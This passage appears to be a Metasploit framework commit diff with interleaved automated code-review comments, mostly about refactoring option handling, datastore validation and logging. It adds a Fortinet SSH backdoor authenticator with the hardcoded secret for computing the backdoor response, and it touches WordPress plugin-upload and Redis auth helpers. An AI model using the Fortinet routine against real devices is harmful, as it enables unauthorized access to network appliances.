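Review bot: `row[-1] << (" " + session.platform)` appends in place to whatever `session.type.to_s` returned, and `String#to_s` returns the receiver itself, so if `type` hands back a stored String the platform is appended to the session's own value on every listing. The removed code had the same pattern with `row[1] <<`, but since the row is rebuilt here anyway a fresh string avoids it: `type = session.type.to_s.dup`, then `type << " #{session.platform}" if session.respond_to?(:platform)` and `row << type`. Whether `session.type` already returns a new string on each call is not visible from this hunk.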
@@ -37,13 +37,13 @@ module MeterpreterOptions framework.sessions.schedule Proc.new { # Configure unicode encoding before loading stdapi - session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false ) + session.encode_unicode = datastore['EnableUnicodeEncoding'] session.init_ui(self.user_input, self.user_output) valid = true - if datastore['AutoVerifySession'] == true + if datastore['AutoVerifySession'] if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) print_error("Meterpreter session #{session.sid} is not valid and will be closed") valid = false @@ -52,7 +52,7 @@ module MeterpreterOptions if valid - if datastore['AutoLoadStdapi'] == true + if datastore['AutoLoadStdapi'] session.load_stdapi @@ -72,7 +72,7 @@ module MeterpreterOptions end [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - if (datastore[key].empty? == false) + if !datastore[key].empty? args = Shellwords.shellwords( datastore[key] ) print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") session.execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 05962133fc..d86a5f4dbd 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -84,7 +84,7 @@ module VncInjectOptions print_status("Local TCP relay started.") # If the AUTOVNC flag is set, launch VNC viewer. - if (datastore['AUTOVNC'] == true) + if datastore['AUTOVNC'] if (session.autovnc(datastore['ViewOnly'])) print_status("Launched vncviewer.") else diff --git a/lib/msf/base/simple/framework/module_paths.rb b/lib/msf/base/simple/framework/module_paths.rb index d2ba08fc3f..4b91f1b15b 100644 --- a/lib/msf/base/simple/framework/module_paths.rb +++ b/lib/msf/base/simple/framework/module_paths.rb 
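Review bot: Dropping `== true` from `if datastore['AutoVerifySession']` and `if datastore['AutoLoadStdapi']` turns a strict boolean test into a truthiness test, and in Ruby the string `"false"` is truthy. That is safe only if every path that writes these keys stores a real boolean; the data_store.rb hunks in this commit normalize a value only when an option object is registered for the key and `validate_on_assignment?` is true, so a value set through `import_options_from_hash` may still be a String. The same change appears in vncinject_options.rb (`datastore['AUTOVNC']`), exploit.rb (`datastore['EnableContextEncoding']`) and http/server.rb (`HTTP::chunked`, `HTTP::header_folding`, `HTTP::junk_headers`). A comment at the first use, such as `# relies on DataStore normalizing OptBool values to true/false`, would record the assumption; the enclosing Proc continues outside this hunk.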
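Review bot: `if !datastore[key].empty?` in the `['InitialAutoRunScript', 'AutoRunScript'].each` loop raises NoMethodError when the key holds nil, and with the data_store.rb change in this commit defaults are no longer passed through `to_s` before being stored. The command_shell.rb hunk earlier in this commit guards the same lookup with `datastore['InitialAutoRunScript'] &&`; the two session types should agree: `if datastore[key] && !datastore[key].empty?`.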
@@ -21,7 +21,7 @@ module Msf allowed_module_paths << Msf::Config.user_module_directory end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each do |engine| extract_engine_module_paths(engine).each do |path| allowed_module_paths << path end diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index e52ff259de..4fd18ca9c3 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]), + Opt::SSLVersion ], self.class ) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 20714c8eb3..9867ad0664 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -20,7 +20,7 @@ module Msf register_options( [ Opt::RPORT(6379), - OptString.new('Password', [false, 'Redis password for authentication test', 'foobared']) + OptString.new('PASSWORD', [false, 'Redis password for authentication test', 'foobared']) ] ) 
@@ -48,29 +48,29 @@ module Msf def redis_command(*commands) command_string = printable_redis_response(commands.join(' ')) unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] - vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})") - if (auth_response = send_redis_command('AUTH', datastore['Password'])) + vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") + if (auth_response = send_redis_command('AUTH', datastore['PASSWORD'])) unless auth_response =~ /\+OK/ - vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}") + vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return end - vprint_status("#{peer} -- authenticated") + vprint_status("Authenticated") unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end else - vprint_status("#{peer} -- authentication failed; no response") + vprint_status("Authentication failed; no response") return end end - vprint_status("#{peer} -- redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") + vprint_status("Redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") command_response end diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index ac4991cbf0..43b4c4c905 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb 
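Review bot: The rewritten `vprint_status("Requires authentication (...)")` line interpolates `auth_response` one line before `auth_response` is first assigned, so Ruby parses it as a method call and the line raises NameError unless a method of that name exists elsewhere. The response that triggered this branch is `command_response`, so it should read `vprint_status("Requires authentication (#{printable_redis_response(command_response, false)})")`. The option was renamed to `PASSWORD` in the previous hunk, but the `fail_with` guard just above still reads `datastore['Password']` and its message still says "Password unset"; whether the datastore lookup is case-insensitive is not visible here, so both should use `datastore['PASSWORD']`.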
@@ -42,6 +42,11 @@ def check end +def peer + # IPv4 addr can be 16 chars + 1 for : and + 5 for port + super.ljust(21) +end + # # The command handler when launched from the console # diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f4da1911e0..81a3e2ed55 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -13,6 +13,7 @@ class DataStore < Hash # Initializes the data store's internal state. # def initialize() + @options = Hash.new @imported = Hash.new @imported_by = Hash.new end @@ -26,6 +27,16 @@ class DataStore < Hash @imported[k] = false @imported_by[k] = nil + opt = @options[k] + unless opt.nil? + if opt.validate_on_assignment? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"]) + end + v = opt.normalize(v) + end + end + super(k,v) end @@ -65,17 +76,11 @@ class DataStore < Hash # all of the supplied options # def import_options(options, imported_by = nil, overwrite = false) - options.each_option { |name, opt| - # If there's already a value defined for this option, then skip it - # and don't import it. - next if self.has_key?(name) and overwrite == false - - # If the option has a default value, import it, but only if the - # datastore doesn't already have a value set for it. - if ((opt.default != nil) and (overwrite or self[name] == nil)) - import_option(name, opt.default.to_s, true, imported_by) + options.each_option do |name, opt| + if self[name].nil? || overwrite + import_option(name, opt.default, true, imported_by, opt) end - } + end end # 
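Review bot: In the rewritten `import_options`, an option whose key already holds a value is skipped entirely, so `import_option` never records its option object and the validate-on-assignment check added to `store` in the previous hunk never runs for later writes to that key. Registering the option before the condition closes the gap: `@options[name] = opt` as the first statement of the block. The new condition also imports a nil default, which the removed code deliberately skipped, so the key now exists with a nil value; if that is intended, the method comment should say so.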
@@ -124,13 +129,14 @@ class DataStore < Hash # def import_options_from_hash(option_hash, imported = true, imported_by = nil) option_hash.each_pair { |key, val| - import_option(key, val.to_s, imported, imported_by) + import_option(key, val, imported, imported_by) } end - def import_option(key, val, imported=true, imported_by=nil) + def import_option(key, val, imported=true, imported_by=nil, option=nil) self.store(key, val) + @options[key] = option @imported[key] = imported @imported_by[key] = imported_by end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 60d421b617..4e4ba8315c 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -163,14 +163,4 @@ class Msf::DBManager true end - - # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6. - # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond. - def warn_about_rubies - if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/ - $stderr.puts "**************************************************************************************" - $stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/" - $stderr.puts "**************************************************************************************" - end - end end diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c93fb6cb5b..3a243fdfb1 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb 
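Review bot: `@options[key] = option` in `import_option` runs unconditionally, so `import_options_from_hash`, which calls it without the fifth argument, replaces any option object already registered for the key with nil and switches off validation for it. The assignment also comes after `self.store(key, val)`, so the value being imported is checked against the previously registered option, or none, rather than the one passed in. Keeping an existing registration is a one-line change, `@options[key] = option unless option.nil?`, and it should move above the `store` call if imported values are meant to be validated too. The new `option` parameter needs a line in the method's doc comment.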
@@ -16,7 +16,8 @@ module Msf::DBManager::Import autoload :Acunetix, 'msf/core/db_manager/import/acunetix' autoload :Amap, 'msf/core/db_manager/import/amap' autoload :Appscan, 'msf/core/db_manager/import/appscan' - autoload :Burp, 'msf/core/db_manager/import/burp' + autoload :BurpIssue, 'msf/core/db_manager/import/burp_issue' + autoload :BurpSession, 'msf/core/db_manager/import/burp_session' autoload :CI, 'msf/core/db_manager/import/ci' autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' @@ -41,7 +42,8 @@ module Msf::DBManager::Import include Msf::DBManager::Import::Acunetix include Msf::DBManager::Import::Amap include Msf::DBManager::Import::Appscan - include Msf::DBManager::Import::Burp + include Msf::DBManager::Import::BurpIssue + include Msf::DBManager::Import::BurpSession include Msf::DBManager::Import::CI include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::FusionVM @@ -252,6 +254,9 @@ module Msf::DBManager::Import elsif (firstline.index("")) @import_filedata[:type] = "Retina XML" return :retina_xml + elsif (firstline.index(//)) + @import_filedata[:type] = "OpenVAS XML" + return :openvas_new_xml elsif (firstline.index(//)) @import_filedata[:type] = "OpenVAS XML" return :openvas_new_xml @@ -267,6 +272,9 @@ module Msf::DBManager::Import elsif (data[0,1024] =~ / wspace, :host => addr, :state => Msf::HostState::Alive) - name = p[1].strip - port = p[2].to_i - proto = p[3].downcase + if p + name = p[1].strip + port = p[2].to_i + proto = p[3].downcase + else + port = nil + end info = { :workspace => wspace, :host => hobj, :port => port, :proto => proto, :task => task } - if name != "unknown" and name[-1,1] != "?" + if name and name != "unknown" and name[-1,1] != "?" info[:name] = name end report_service(info) diff --git a/lib/msf/core/db_manager/import/open_vas.rb b/lib/msf/core/db_manager/import/open_vas.rb index 9991d19e86..f2ef38929f 100644 
--- a/lib/msf/core/db_manager/import/open_vas.rb +++ b/lib/msf/core/db_manager/import/open_vas.rb @@ -29,6 +29,6 @@ module Msf::DBManager::Import::OpenVAS filename = args[:filename] wspace = args[:wspace] || workspace - raise Msf::DBImportError.new("No OpenVAS XML support. Please submit a patch to msfdev[at]metasploit.com") + raise Msf::DBImportError.new("No OpenVas XML support. Please submit a patch to msfdev[at]metasploit.com") end end diff --git a/lib/msf/core/db_manager/migration.rb b/lib/msf/core/db_manager/migration.rb index 5d98eb960e..4c6430bd52 100644 --- a/lib/msf/core/db_manager/migration.rb +++ b/lib/msf/core/db_manager/migration.rb @@ -10,7 +10,7 @@ module Msf::DBManager::Migration "the .bundle/config manually and then `bundle install`" end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each.each do |engine| migrations_paths = engine.paths['db/migrate'].existent_directories migrations_paths.each do |migrations_path| diff --git a/lib/msf/core/db_manager/module_cache.rb b/lib/msf/core/db_manager/module_cache.rb index 5e23cb6d2c..06af2be5be 100644 --- a/lib/msf/core/db_manager/module_cache.rb +++ b/lib/msf/core/db_manager/module_cache.rb @@ -201,7 +201,7 @@ module Msf::DBManager::ModuleCache end end - query = Mdm::Module::Detail.scoped + query = Mdm::Module::Detail.all ActiveRecord::Base.connection_pool.with_connection do # Although AREL supports taking the union or two queries, the ActiveRecord where syntax only supports @@ -214,7 +214,7 @@ module Msf::DBManager::ModuleCache when 'author' formatted_values = match_values(value_set) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) module_authors = Mdm::Module::Author.arel_table union_conditions << module_authors[:email].matches_any(formatted_values) union_conditions << module_authors[:name].matches_any(formatted_values) 
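Review bot: The new iterator in migration.rb reads `.each.each do |engine|`; the first `each` has no block and only returns an Enumerator, so it works, but it is a typo next to the module_paths.rb hunk, which uses a single `each`. It should read `::Rails::Engine.subclasses.map(&:instance).each do |engine|`. `subclasses` lists direct subclasses only, so an engine class derived from another engine would be missed; worth confirming against the engines actually loaded.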
@@ -227,10 +227,10 @@ module Msf::DBManager::ModuleCache when 'os', 'platform' formatted_values = match_values(value_set) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'text' formatted_values = match_values(value_set) @@ -240,22 +240,22 @@ module Msf::DBManager::ModuleCache union_conditions << module_details[:fullname].matches_any(formatted_values) union_conditions << module_details[:name].matches_any(formatted_values) - query = query.includes(:actions) + query = query.includes(:actions).references(:actions) union_conditions << Mdm::Module::Action.arel_table[:name].matches_any(formatted_values) - query = query.includes(:archs) + query = query.includes(:archs).references(:archs) union_conditions << Mdm::Module::Arch.arel_table[:name].matches_any(formatted_values) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) union_conditions << Mdm::Module::Author.arel_table[:name].matches_any(formatted_values) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) - query = query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'type' formatted_values = match_values(value_set) 
@@ -275,7 +275,7 @@ module Msf::DBManager::ModuleCache when 'ref' formatted_values = match_values(value_set) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) when 'cve', 'bid', 'osvdb', 'edb' formatted_values = value_set.collect { |value| @@ -284,7 +284,7 @@ module Msf::DBManager::ModuleCache "#{prefix}-%#{value}%" } - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) end end diff --git a/lib/msf/core/db_manager/workspace.rb b/lib/msf/core/db_manager/workspace.rb index 6bc4d3c9fe..70652b3beb 100644 --- a/lib/msf/core/db_manager/workspace.rb +++ b/lib/msf/core/db_manager/workspace.rb @@ -30,7 +30,7 @@ module Msf::DBManager::Workspace def workspaces ::ActiveRecord::Base.connection_pool.with_connection { - ::Mdm::Workspace.order('updated_at asc').all + ::Mdm::Workspace.order('updated_at asc').load } end end diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 076107891e..c483d25358 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -537,7 +537,7 @@ protected # def find_context_key(buf, badchars, state) # Make sure our context information file is sane - if File.exists?(datastore['ContextInformationFile']) == false + if !File.exists?(datastore['ContextInformationFile']) raise NoKeyError, "A context information file must specified when using context encoding", caller end diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index e2d2bbc5d1..e976d84e97 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb 
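Review bot: `File.exists?` in the rewritten condition in `find_context_key` is the deprecated alias of `File.exist?` and is removed in Ruby 3.2, and `if !…` reads better as `unless`. If the option is unset, the call raises TypeError before the NoKeyError below can be raised, so the nil case belongs in the same test: `path = datastore['ContextInformationFile']` followed by `unless path && File.exist?(path)`. The error message on the next context line is missing a word ("must be specified"). `find_context_key` continues outside the hunk.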
@@ -649,14 +649,14 @@ class Exploit < Msf::Module # Returns true if the exploit has an aggressive stance. # def aggressive? - (stance == Stance::Aggressive) + (stance == Stance::Aggressive || stance.include?(Stance::Aggressive)) end # # Returns if the exploit has a passive stance. # def passive? - (stance == Stance::Passive) + (stance == Stance::Passive || stance.include?(Stance::Passive)) end # @@ -1197,9 +1197,15 @@ class Exploit < Msf::Module # value can be one of the Handler::constants. # def handler(*args) - return if not payload_instance - return if not handler_enabled? - return payload_instance.handler(*args) + if payload_instance && handler_enabled? + payload_instance.handler(*args) + end + end + + def interrupt_handler + if payload_instance && handler_enabled? && payload_instance.respond_to?(:interrupt_wait_for_session) + payload_instance.interrupt_wait_for_session() + end end ## @@ -1351,6 +1357,9 @@ class Exploit < Msf::Module # Report the failure (and attempt) in the database self.report_failure + + # Interrupt any session waiters in the handler + self.interrupt_handler end def report_failure @@ -1506,7 +1515,7 @@ protected # required when wanting to support context keyed encoding # def define_context_encoding_reqs(reqs) - return if datastore['EnableContextEncoding'] != true + return unless datastore['EnableContextEncoding'] # At present, we don't support any automatic methods of obtaining # context information. In the future, we might support obtaining diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb new file mode 100644 index 0000000000..9b8aae1f9c --- /dev/null +++ b/lib/msf/core/exploit/fortinet.rb 
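Review bot: `stance.include?(Stance::Aggressive)` in `aggressive?`, and the matching line in `passive?`, behaves differently by type: on an Array it is a membership test, on a String a substring test, and on nil it raises NoMethodError where the old `==` simply returned false. `Array(stance).include?(Stance::Aggressive)` gives exact matching for a single value and for a list, tolerates nil, and makes the leading `stance ==` comparison unnecessary. The comments above both methods still describe a single stance and should mention that a list is accepted.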
@@ -0,0 +1,99 @@ +# -*- coding: binary -*- + +# https://www.ietf.org/rfc/rfc4256.txt + +require 'net/ssh' + +module Msf::Exploit::Remote::Fortinet + class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract + + USERAUTH_INFO_REQUEST = 60 + USERAUTH_INFO_RESPONSE = 61 + + def authenticate(service_name, username = 'Fortimanager_Access', password = nil) + debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) + + loop do + message = session.next_message + + case message.type + when USERAUTH_SUCCESS + debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } + return true + when USERAUTH_FAILURE + debug { 'Received SSH_MSG_USERAUTH_FAILURE' } + return false + when USERAUTH_INFO_REQUEST + debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } + +=begin + string name (ISO-10646 UTF-8) + string instruction (ISO-10646 UTF-8) + string language tag (as defined in [RFC-3066]) + int num-prompts + string prompt[1] (ISO-10646 UTF-8) + boolean echo[1] + ... + string prompt[num-prompts] (ISO-10646 UTF-8) + boolean echo[num-prompts] +=end + name = message.read_string + instruction = message.read_string + _ = message.read_string + + prompts = [] + + message.read_long.times do + prompt = message.read_string + echo = message.read_bool + prompts << [prompt, echo] + end + + debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } + + send_message(Net::SSH::Buffer.from( +=begin + byte SSH_MSG_USERAUTH_INFO_RESPONSE + int num-responses + string response[1] (ISO-10646 UTF-8) + ... 
+ string response[num-responses] (ISO-10646 UTF-8) +=end + :byte, USERAUTH_INFO_RESPONSE, + :long, 1, + :string, custom_handler(name, instruction, prompts) + )) + else + raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" + end + end + end + + # http://seclists.org/fulldisclosure/2016/Jan/26 + def custom_handler(title, instructions, prompt_list) + n = prompt_list[0][0] + m = Digest::SHA1.new + m.update("\x00" * 12) + m.update(n + 'FGTAbc11*xy+Qqz27') + m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") + h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) + [h] + end + + end +end diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 41dea0f789..df6b2c91ee 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -56,7 +56,7 @@ module Exploit::Remote::FtpServer # exists for the given command, returns a generic default response. # # @example Handle SYST requests - # class Metasploit4 < Msf::Exploit + # class MetasploitModule < Msf::Exploit # include Msf::Exploit::Remote::FtpServer # ... # def on_client_command_syst(cmd_conn, arg) @@ -237,4 +237,3 @@ module Exploit::Remote::FtpServer end end - diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..5b57e2e408 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
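Review bot: `custom_handler` reads `prompt_list[0][0]` without checking that the peer sent a prompt, so an INFO_REQUEST whose `num-prompts` is 0 ends in NoMethodError on nil instead of the `Net::SSH::Exception` that `authenticate` raises for other protocol errors. A guard before the response is built keeps failures in one exception type: `raise Net::SSH::Exception, 'USERAUTH_INFO_REQUEST carried no prompts' if prompts.empty?`. The file uses `Digest::SHA1` and `Base64` while requiring only `net/ssh`; explicit `require 'digest/sha1'` and `require 'base64'` would remove the dependence on load order. The unused `password` parameter and the unused `title` and `instructions` arguments should carry a `_` prefix or a comment saying why they are ignored.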
@@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), + Opt::SSLVersion, OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']), OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']) @@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient # # Remaining evasions to implement # -# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']), +# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]), # OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]), ], self.class ) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b58eb8a4a..7eb5370411 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
@@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer register_evasion_options( [ - OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']), - OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']), - OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']), + OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), + OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), + OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]), OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache']) ], Exploit::Remote::HttpServer 
@@ -72,60 +72,13 @@ module Exploit::Remote::HttpServer Thread.current[:cli] = cli end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super + def print_prefix + if cli && (respond_to?(:aggressive) && !aggressive?) + super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " + else + super + end end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_good(msg='') - (cli) ? 
super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # # Ensures that gzip can be used. If not, an exception is generated. The @@ -133,7 +86,7 @@ module Exploit::Remote::HttpServer # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end @@ -577,16 +530,16 @@ module Exploit::Remote::HttpServer response.compress = datastore['HTTP::compression'] end - if (datastore['HTTP::chunked'] == true) + if datastore['HTTP::chunked'] response.auto_cl = false response.transfer_chunked = true end - if (datastore['HTTP::header_folding'] == true) + if datastore['HTTP::header_folding'] response.headers.fold = 1 end - if (datastore['HTTP::junk_headers'] == true) + if datastore['HTTP::junk_headers'] response.headers.junk_headers = 1 end diff --git a/lib/msf/core/exploit/http/wordpress/admin.rb b/lib/msf/core/exploit/http/wordpress/admin.rb index 7fc84f856c..a17f2b6058 100644 --- a/lib/msf/core/exploit/http/wordpress/admin.rb +++ b/lib/msf/core/exploit/http/wordpress/admin.rb 
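Review bot: `respond_to?(:aggressive)` in the new `print_prefix` tests for a method without the question mark, while the call beside it is `aggressive?`, the name exploit.rb defines. Unless some class also defines a plain `aggressive` method, the condition is always false and the client prefix is never added, which silently drops the per-client attribution the removed `print_*` overrides provided. It should read `if cli && respond_to?(:aggressive?) && !aggressive?`.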
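Review bot: In `use_zlib`, `datastore['HTTP::compression']` is an OptEnum whose values are 'none', 'gzip' and 'deflate' (see the `register_evasion_options` hunk in this file), so the bare truthiness test is true even for the default 'none' and the method now raises whenever zlib is missing. The old `== true` never matched a string, so the check was dead code before; the intended test is presumably `if !Rex::Text.zlib_present? && %w[gzip deflate].include?(datastore['HTTP::compression'])`.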
@@ -10,10 +10,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin def wordpress_upload_plugin(name, zip, cookie) nonce = wordpress_helper_get_plugin_upload_nonce(cookie) if nonce.nil? - vprint_error("#{peer} - Failed to acquire the plugin upload nonce") + vprint_error("Failed to acquire the plugin upload nonce") return false end - vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}") + vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new @@ -32,11 +32,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin ) if res && res.code == 200 - vprint_status("#{peer} - Uploaded plugin #{name}") + vprint_status("Uploaded plugin #{name}") return true else - vprint_error("#{peer} - Server responded with code #{res.code}") if res - vprint_error("#{peer} - Failed to upload plugin #{name}") + vprint_error("Server responded with code #{res.code}") if res + vprint_error("Failed to upload plugin #{name}") return false end end diff --git a/lib/msf/core/exploit/http/wordpress/base.rb b/lib/msf/core/exploit/http/wordpress/base.rb index 